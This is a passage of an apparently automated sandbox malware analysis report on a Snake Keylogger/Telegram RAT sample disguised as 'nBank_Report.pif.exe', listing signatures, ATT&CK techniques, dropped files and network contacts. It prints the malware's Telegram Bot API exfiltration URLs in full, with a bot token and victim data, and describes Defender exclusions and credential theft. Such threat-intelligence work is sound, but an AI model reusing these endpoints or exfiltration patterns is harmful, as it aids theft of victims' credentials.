              Source: Yara matchFile source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 5500, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.49954c0.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.4100c80.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.49954c0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.nBank_Report.pif.exe.4100c80.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.VtPPJdSqnkbmja.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.3886664444.0000000007090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3882678139.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3867494805.0000000002AF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3867494805.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1714614207.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.3871996905.0000000003D9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: nBank_Report.pif.exe PID: 7792, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nBank_Report.pif.exe PID: 3276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: VtPPJdSqnkbmja.exe PID: 5500, type: MEMORYSTR
              Yara detected Telegram RAT
              Source: Yara matchFile source: Process Memory Space: nBank_Report.pif.exe PID: 3276, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network Medium1
              Inhibit System Recovery
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scheduled Task/Job              		12
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory13
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Scheduled Task/Job              		31
              Obfuscated Files or Information              		Security Account Manager111
              Security Software Discovery              		SMB/Windows Admin Shares1
              Email Collection              		11
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
              Software Packing              		NTDS2
              Process Discovery              		Distributed Component Object Model1
              Clipboard Data              		3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp              		LSA Secrets41
              Virtualization/Sandbox Evasion              		SSHKeylogging14
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Masquerading              		DCSync1
              System Network Configuration Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
              Virtualization/Sandbox Evasion              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519333 Sample: nBank_Report.pif.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 4 other IPs or domains 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 10 other signatures 2->68 8 nBank_Report.pif.exe 7 2->8         started        12 VtPPJdSqnkbmja.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\...\VtPPJdSqnkbmja.exe, PE32 8->38 dropped 40 C:\...\VtPPJdSqnkbmja.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp6F97.tmp, XML 8->42 dropped 44 C:\Users\user\...\nBank_Report.pif.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 14 nBank_Report.pif.exe 17 29 8->14         started        18 powershell.exe 23 8->18         started        20 schtasks.exe 1 8->20         started        22 nBank_Report.pif.exe 8->22         started        74 Multi AV Scanner detection for dropped file 12->74 76 Machine Learning detection for dropped file 12->76 24 schtasks.exe 12->24         started        26 VtPPJdSqnkbmja.exe 12->26         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49740, 49745 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.96.3, 443, 49706, 49708 CLOUDFLARENETUS European Union 14->54 56 checkip.dyndns.com 132.226.247.73, 49705, 49709, 49711 UTMEMUS United States 14->56 78 Moves itself to temp directory 14->78 80 Tries to steal Mail credentials (via file / registry access) 14->80 82 Tries to harvest and steal browser information (history, passwords, etc) 14->82 86 2 other signatures 14->86 84 Loading BitLocker PowerShell Module 18->84 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 24->34         started        36 WerFault.exe 26->36         started        signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              nBank_Report.pif.exe42%ReversingLabsByteCode-MSIL.Trojan.Generic
              nBank_Report.pif.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe42%ReversingLabsWin32.Trojan.Generic

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://checkip.dyndns.org/0%URL Reputationsafe
              http://checkip.dyndns.org/q0%URL Reputationsafe
              https://reallyfreegeoip.org0%URL Reputationsafe
              http://checkip.dyndns.org0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/0%URL Reputationsafe
              https://reallyfreegeoip.org/xml/8.46.123.33$0%Avira URL Cloudsafe
              http://checkip.dyndns.com0%Avira URL Cloudsafe
              https://api.telegram.org0%Avira URL Cloudsafe
              http://purl.oen0%Avira URL Cloudsafe
              https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=13940%Avira URL Cloudsafe
              https://api.telegram.org/bot0%Avira URL Cloudsafe
              https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake0%Avira URL Cloudsafe
              https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.10%Avira URL Cloudsafe
              http://reallyfreegeoip.org0%Avira URL Cloudsafe
              https://reallyfreegeoip.org/xml/8.46.123.330%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              		199.232.214.172
              		truefalse
                		unknown
                reallyfreegeoip.org
                		188.114.96.3
                		truetrue
                  		unknown
                  api.telegram.org
                  		149.154.167.220
                  		truetrue
                    		unknown
                    checkip.dyndns.com
                    		132.226.247.73
                    		truefalse
                      		unknown
                      windowsupdatebg.s.llnwi.net
                      		87.248.204.0
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://checkip.dyndns.org/false
                          • URL Reputation: safe
                          		unknown
                          https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1true
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snaketrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33false
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.telegram.orgnBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B0A000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/botnBank_Report.pif.exe, 00000008.00000002.3882678139.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/8.46.123.33$VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029A9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://checkip.dyndns.org/qnBank_Report.pif.exe, 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://reallyfreegeoip.orgVtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.000000000297E000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.orgVtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002966000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029A9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://checkip.dyndns.orgVtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A2F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.000000000295A000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002966000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029A9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://checkip.dyndns.comVtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A06000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A14000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002966000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000029F9000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002A5D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.telegram.org/bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002B1B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenBank_Report.pif.exe, 00000000.00000002.1477487756.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000A.00000002.1543026809.0000000002F88000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://purl.oennBank_Report.pif.exe, 00000008.00000002.3892798514.0000000008AB0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://reallyfreegeoip.org/xml/nBank_Report.pif.exe, 00000000.00000002.1478197237.000000000402D000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000000.00000002.1478197237.0000000004995000.00000004.00000800.00020000.00000000.sdmp, nBank_Report.pif.exe, 00000008.00000002.3867494805.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000A.00000002.1544216259.00000000040CD000.00000004.00000800.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1712790952.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VtPPJdSqnkbmja.exe, 0000000D.00000002.1714614207.0000000002966000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          149.154.167.220
                          		api.telegram.orgUnited Kingdom
                          		62041TELEGRAMRUtrue
                          188.114.96.3
                          		reallyfreegeoip.orgEuropean Union
                          		13335CLOUDFLARENETUStrue
                          132.226.247.73
                          		checkip.dyndns.comUnited States
                          		16989UTMEMUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519333
                          Start date and time:2024-09-26 11:32:09 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 50s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:nBank_Report.pif.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@19/18@4/3
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 101
                          • Number of non-executed functions: 8
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.42.65.92, 2.16.100.168, 88.221.110.91, 199.232.214.172, 93.184.221.240
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net
                          • Execution Graph export aborted for target VtPPJdSqnkbmja.exe, PID 5500 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: nBank_Report.pif.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          05:33:16API Interceptor5855686x Sleep call for process: nBank_Report.pif.exe modified
                          05:33:21API Interceptor16x Sleep call for process: powershell.exe modified
                          05:33:23API Interceptor88x Sleep call for process: VtPPJdSqnkbmja.exe modified
                          05:33:46API Interceptor1x Sleep call for process: WerFault.exe modified
                          11:33:22Task SchedulerRun new task: VtPPJdSqnkbmja path: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          149.154.167.220z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                            ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                              SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                        Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                            SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              188.114.96.3ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                              • www.chinaen.org/zi4g/
                                              http://twint.ch-daten.com/de/receive/bank/sgkb/79469380Get hashmaliciousUnknownBrowse
                                              • twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
                                              Cbequipment-Voice Audio Interface.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • www.444317.com/
                                              Sept order.docGet hashmaliciousFormBookBrowse
                                              • www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
                                              1e#U0414.exeGet hashmaliciousLokibotBrowse
                                              • dddotx.shop/Mine/PWS/fre.php
                                              https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                                              • hdcy.emcl00.com/qRCfs/
                                              PO23100072.exeGet hashmaliciousFormBookBrowse
                                              • www.cc101.pro/ttiz/
                                              RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                                              • www.1win-moldovia.fun/1g7m/
                                              TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                              • www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
                                              Petronas quotation request.exeGet hashmaliciousFormBookBrowse
                                              • www.chinaen.org/zi4g/
                                              132.226.247.73Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              file.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              rLegalOpinionCopy_doc.cmdGet hashmaliciousVIP KeyloggerBrowse
                                              • checkip.dyndns.org/
                                              cargo details.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • checkip.dyndns.org/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              reallyfreegeoip.orgz1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                              • 188.114.97.3
                                              ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                              • 188.114.96.3
                                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.97.3
                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              • 188.114.96.3
                                              checkip.dyndns.comz1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
